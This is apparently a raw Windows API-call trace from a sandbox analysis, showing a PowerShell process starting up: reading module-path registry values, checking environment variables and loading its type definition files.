	[0514.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.514] CoTaskMemFree (pv=0x2c1dd0) 
	[0514.514] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0514.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.514] CoTaskMemFree (pv=0x2c1dd0) 
	[0519.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0519.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0519.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0519.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.971] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0521.971] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0521.971] CoTaskMemFree (pv=0x2c1dd0) 
	[0521.972] CoTaskMemAlloc (cb=0xcc) returned 0x371bc0
	[0521.972] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x371bc0, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0521.973] CoTaskMemFree (pv=0x371bc0) 
	[0521.973] CoTaskMemAlloc (cb=0xf0) returned 0x1b829db0
	[0521.973] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b829db0, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0521.973] CoTaskMemFree (pv=0x1b829db0) 
	[0521.973] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d668 | out: phkResult=0x12d668*=0x2e8) returned 0x0
	[0521.973] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d5ec, lpData=0x0, lpcbData=0x12d5e8*=0x0 | out: lpType=0x12d5ec*=0x2, lpData=0x0, lpcbData=0x12d5e8*=0x6c) returned 0x0
	[0521.973] CoTaskMemAlloc (cb=0x70) returned 0x2fe550
	[0521.973] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d5bc, lpData=0x2fe550, lpcbData=0x12d5b8*=0x6c | out: lpType=0x12d5bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x12d5b8*=0x6c) returned 0x0
	[0521.973] CoTaskMemFree (pv=0x2fe550) 
	[0521.973] CoTaskMemAlloc (cb=0xcc) returned 0x371bc0
	[0521.973] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x371bc0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0521.973] CoTaskMemFree (pv=0x371bc0) 
	[0521.973] CoTaskMemAlloc (cb=0xcc) returned 0x371bc0
	[0521.973] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x371bc0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0521.973] CoTaskMemFree (pv=0x371bc0) 
	[0521.977] RegCloseKey (hKey=0x2e8) returned 0x0
	[0521.977] CoTaskMemAlloc (cb=0xcc) returned 0x371bc0
	[0521.977] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x371bc0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0521.977] CoTaskMemFree (pv=0x371bc0) 
	[0521.977] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d668 | out: phkResult=0x12d668*=0x2e8) returned 0x0
	[0521.978] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d5ec, lpData=0x0, lpcbData=0x12d5e8*=0x0 | out: lpType=0x12d5ec*=0x0, lpData=0x0, lpcbData=0x12d5e8*=0x0) returned 0x2
	[0521.978] RegCloseKey (hKey=0x2e8) returned 0x0
	[0523.044] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0523.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0523.044] CoTaskMemFree (pv=0x2c1dd0) 
	[0523.045] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0523.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0523.046] CoTaskMemFree (pv=0x2c1dd0) 
	[0523.052] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0523.052] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0523.052] CoTaskMemFree (pv=0x2c1dd0) 
	[0523.052] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0523.052] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0523.053] CoTaskMemFree (pv=0x2c1dd0) 
	[0523.058] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d458 | out: phkResult=0x12d458*=0x2e8) returned 0x0
	[0523.059] RegQueryValueExW (in: hKey=0x2e8, lpValueName="path", lpReserved=0x0, lpType=0x12d46c, lpData=0x0, lpcbData=0x12d468*=0x0 | out: lpType=0x12d46c*=0x1, lpData=0x0, lpcbData=0x12d468*=0x74) returned 0x0
	[0523.059] RegQueryValueExW (in: hKey=0x2e8, lpValueName="path", lpReserved=0x0, lpType=0x12d3dc, lpData=0x0, lpcbData=0x12d3d8*=0x0 | out: lpType=0x12d3dc*=0x1, lpData=0x0, lpcbData=0x12d3d8*=0x74) returned 0x0
	[0523.059] CoTaskMemAlloc (cb=0x78) returned 0x2fe550
	[0523.059] RegQueryValueExW (in: hKey=0x2e8, lpValueName="path", lpReserved=0x0, lpType=0x12d3ac, lpData=0x2fe550, lpcbData=0x12d3a8*=0x74 | out: lpType=0x12d3ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d3a8*=0x74) returned 0x0
	[0523.059] CoTaskMemFree (pv=0x2fe550) 
	[0523.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0523.059] SetErrorMode (uMode=0x1) returned 0x1
	[0523.059] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d330 | out: lpFileInformation=0x12d330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0523.059] SetErrorMode (uMode=0x1) returned 0x1
	[0523.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0523.062] SetErrorMode (uMode=0x1) returned 0x1
	[0523.062] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d330 | out: lpFileInformation=0x12d330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0523.062] SetErrorMode (uMode=0x1) returned 0x1
	[0523.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0523.067] SetErrorMode (uMode=0x1) returned 0x1
	[0523.067] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d330 | out: lpFileInformation=0x12d330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0523.067] SetErrorMode (uMode=0x1) returned 0x1
	[0523.068] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0523.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0523.068] CoTaskMemFree (pv=0x2c1dd0) 
	[0523.070] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0523.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0523.070] CoTaskMemFree (pv=0x2c1dd0) 
	[0523.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0523.076] SetErrorMode (uMode=0x1) returned 0x1
	[0523.077] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0523.077] GetFileType (hFile=0x338) returned 0x1
	[0523.077] SetErrorMode (uMode=0x1) returned 0x1
	[0523.077] GetFileType (hFile=0x338) returned 0x1
	[0523.078] ReadFile (in: hFile=0x338, lpBuffer=0x2e9c370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2e9c370*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0523.080] ReadFile (in: hFile=0x338, lpBuffer=0x2e9c370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2e9c370*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0523.080] ReadFile (in: hFile=0x338, lpBuffer=0x2e9c370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2e9c370*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0523.081] ReadFile (in: hFile=0x338, lpBuffer=0x2e9c370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2e9c370*, lpNumberOfBytesRead=0x12d268*=0xcf3, lpOverlapped=0x0) returned 1
	[0523.081] ReadFile (in: hFile=0x338, lpBuffer=0x2e9b7cb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2e9b7cb*, lpNumberOfBytesRead=0x12d268*=0x0, lpOverlapped=0x0) returned 1
	[0523.081] ReadFile (in: hFile=0x338, lpBuffer=0x2e9c370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2e9c370*, lpNumberOfBytesRead=0x12d268*=0x0, lpOverlapped=0x0) returned 1
	[0523.083] CloseHandle (hObject=0x338) returned 1
	[0523.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0523.086] SetErrorMode (uMode=0x1) returned 0x1
	[0523.086] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d1e0 | out: lpFileInformation=0x12d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0523.086] SetErrorMode (uMode=0x1) returned 0x1
	[0524.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0524.088] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x338) returned 0x0
	[0524.088] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d24c, lpData=0x0, lpcbData=0x12d248*=0x0 | out: lpType=0x12d24c*=0x1, lpData=0x0, lpcbData=0x12d248*=0x56) returned 0x0
	[0524.088] CoTaskMemAlloc (cb=0x5a) returned 0x1b836d20
	[0524.088] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d21c, lpData=0x1b836d20, lpcbData=0x12d218*=0x56 | out: lpType=0x12d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d218*=0x56) returned 0x0
	[0524.088] CoTaskMemFree (pv=0x1b836d20) 
	[0524.088] RegCloseKey (hKey=0x338) returned 0x0
	[0524.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0524.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0525.060] GetSystemInfo (in: lpSystemInfo=0x12bf00 | out: lpSystemInfo=0x12bf00*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0525.061] VirtualQuery (in: lpAddress=0x12bfb0, lpBuffer=0x12ce70, dwLength=0x30 | out: lpBuffer=0x12ce70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0525.071] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0525.072] GetFileType (hFile=0x2e8) returned 0x1
	[0525.072] SetErrorMode (uMode=0x1) returned 0x1
	[0525.072] GetFileType (hFile=0x2e8) returned 0x1
	[0525.072] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.073] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.073] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.073] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.073] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.073] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.074] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.074] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.074] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.075] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.076] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.076] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
